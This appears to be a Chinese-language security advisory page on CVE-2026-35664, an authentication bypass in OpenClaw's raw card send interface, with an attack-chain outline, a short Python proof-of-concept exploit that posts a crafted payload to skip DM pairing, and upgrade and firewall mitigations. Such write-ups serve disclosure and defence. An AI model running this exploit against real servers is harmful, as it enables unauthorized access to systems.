CVE-2026-35664 CVSS 5.3 中危

CVE-2026-35664 OpenClaw认证绕过漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35664

漏洞类型

认证绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.25之前的版本在原始卡片发送接口中存在认证绕过漏洞。该漏洞允许未配对的接收者利用遗留回调机制生成有效载荷。攻击者无需用户交互，即可通过网络发送构造的原始卡片命令，成功绕过DM配对限制。这导致攻击者能在未经授权的情况下访问回调处理程序，对系统的完整性构成中等风险。

技术细节

该漏洞的核心在于OpenClaw对“raw card send”功能的验证逻辑缺失。在正常业务流程中，发送指令通常需要完成设备间的直接消息（DM）配对，以确保通信双方的身份可信。然而，受影响版本在处理特定类型的原始卡片数据时，未严格校验请求来源的配对状态。攻击者可以利用这一逻辑缺陷，直接向接口发送恶意的原始卡片数据包。这些数据包被系统解析后，会触发遗留的回调处理函数，导致系统误以为是合法的配对设备请求。由于CVE向量显示无需用户交互且攻击复杂度低，攻击者可轻易利用此漏洞进行未授权的操作，尽管机密性未受直接影响，但系统完整性受到了破坏。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络识别出OpenClaw服务实例，并确认其版本低于2026.3.25。

STEP 2

2. 构造攻击载荷

攻击者构造包含原始卡片命令的恶意数据包，指定利用遗留回调功能。

STEP 3

3. 发送攻击请求

攻击者向OpenClaw的原始卡片发送接口发送POST请求，无需经过DM配对认证。

STEP 4

4. 绕过认证与执行

服务器端未正确校验配对状态，直接处理了该请求，触发了回调逻辑，导致认证绕过成功。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_openclaw(target_url):
    """
    PoC for CVE-2026-35664: OpenClaw Authentication Bypass
    Attempts to send a raw card command to bypass DM pairing.
    """
    endpoint = f"{target_url}/api/raw_card_send"
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "CVE-2026-35664-Scanner"
    }
    
    # Malicious payload designed to trigger legacy callback without pairing
    payload = {
        "action": "send_raw_card",
        "data": {
            "type": "legacy_callback",
            "target": "unpaired_recipient",
            "command": "mint_payload"
        }
    }

    try:
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Potential authentication bypass successful!")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "http://example-openclaw-server"
    exploit_openclaw(target)

影响范围

OpenClaw < 2026.3.25

防御指南

临时缓解措施

建议立即将OpenClaw升级至2026.3.25或更高版本以修复此漏洞。如果暂时无法升级，应在网络防火墙层面对“raw card send”相关接口实施访问控制策略（ACL），仅允许受信任的内部IP调用该接口。同时，管理员应检查系统日志，排查是否存在未配对来源的异常调用记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表